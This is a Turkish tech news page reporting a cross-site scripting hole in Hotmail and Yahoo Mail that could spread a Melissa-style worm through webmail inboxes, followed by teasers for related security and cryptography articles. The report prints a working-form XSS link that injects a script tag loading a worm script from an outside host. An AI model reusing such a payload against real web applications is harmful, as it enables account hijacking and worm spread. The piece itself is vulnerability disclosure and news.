Hotmail ve Yahoomail virus tehdidi altında

0
conan
Web tabanlı email servislerinde yeni saptanan bir açık Melissa tipi virüslerin yayılmasına neden olabiliyor.
Açık kısaca şöyle tanımlanıyor. Kötü niyetli kullanıcı emailinin içerisinde web tabanlı servisin serverının bir linkini yerleştiriyor. Bu linkin ucunda ise kişinin inbox'ını gezebilecek ve de bu inbox'da gördüğü her email'e kötü niyetli bir kod yollayabilecek bir Javascript var.
Yahoomail için link örneği: http://us.f117.mail.yahoo.com/ym/ShowFolder?ET=1&YY=12345&inc=10&order=asd%22%3E%3Cscript%20language%3D%22Javascript%22%20src%3D%22http%3A//www.sidesport.com/webworm/webmailworm.js%22%3E%3C/script%3E%3C%22asd

Gelelim işin asıl önemli boyutuna. Email içinde verilen link ile web tabanlı email servisinin serverının adresi aynı olduğundan (domain bazında) bu link hiçbir güvenlik yorumundan geçmeden kullanıcıya sunuluyor. (no domain bounding error) 2 haziran itibari ile her iki büyük web mail servisi de bu sorunu yamamış gibi gözüküyor.

Ayrıntılı bilgi:
- SideSport: Sorunu bulan kişinin sitesi
- SecurityFocusda bu konudaki haber

İlgili Yazılar

İngilizler, Ruslar ve Şifreler

FZ

II. Dünya Savaşı sırasında Bletchley Park´ta çalışan başta Turing olmak üzere matematikçilerin, dilbilimcilerin ve diğerlerinin Almanların Enigma şifresini çözme maceraları konu ile ilgilenenlerin malumudur.

Ancak İngiliz şifre analizcilerinin Sovyetler Birliği şifreleri ilgili yaptıkları önemli çalışmalar yakın bir döneme dek bir sır perdesi ile örtülü idi.

64 bitlik Şifre 4 Yıl Sonra Kırıldı

FZ

Milyonlarca işlemci saati ve dört yıllık insan emeğinin ardından RC5 64-bitlik şifresi kırıldı.

331.252 adet gönüllü makinanın kullanıldığı deneyde Distributed.net isimli isimli bir bilgisayarcı grubu RSA Security'nin meydan okumasını kabul etti ve 10.000$'lık çeki aldı.

"Her ne kadar bu projenin süresi 64 bitlik RC5 algoritmasının güvenilirliği ile ilgili olarak çok problem yaratmıyor gibi görünse de gene de birkaç yıldan daha uzun süre korunması gereken hassas bilgiler için RC5-64'ü tavsiye etmiyoruz," şeklinde konuştu şifreyi kıran grup.

URL Parametrelerini doğru kullanmayınca başa gelenler

tongucyumruk

Hep ciddi ciddi şeyler yazacak değiliz, biraz da eğlenelim. Bazen (düzeltme: çoğu zaman) en büyük şirketler dahi web üzerinde birşeyler yaparken en basit güvenlik önlemlerini unutabiliyorlar. İşte bu sefer madara olan şirketimiz de sürekli olarak geliştiricilerin ahını almaktan çekinmeyen Oracle. Bu linke tıklayarak kendilerinin URL parametrelerini hiçbir doğrulamadan geçirmeden doğrudan...

Kim? Ne zaman? Kiminle? Nerede?

tongucyumruk

Geçenlerde Avea hatlı telefonuma Avea'dan bir mesaj geldi.

KimNerede? servisiyle aklin sevdiklerinde kalmasin! Sevdiklerinin nerede oldugunu ogrenmek icin bir SMS yeter.

Evet, artik sadece kendimizin degil, kimin, ne zaman, nerde oldugunu ogrenebilecegiz. Harika degil mi?

nic.tr'ye Phishing Saldırısı ve Yurdumun "Hacker"ları

dayioglu

Hafta sonu nic.tr'ye (https://www.nic.tr) yönelik yoğun bir phishing saldırısı gerçekleşti. Kısa sürede savuşturduk ve kişisel web siteme yaptıklarımızın kısmi ve kısa bir özetini yazdım.

(Bkz.http://www.dayioglu.net/?q=node/144).

Meğer bu aslında yalnızca bir başlangıçmış. Kısa sürede ülkenin en babayiğit (!) hacker'ları siteme muhterem yorumları ile katkı sağlamaya başladılar.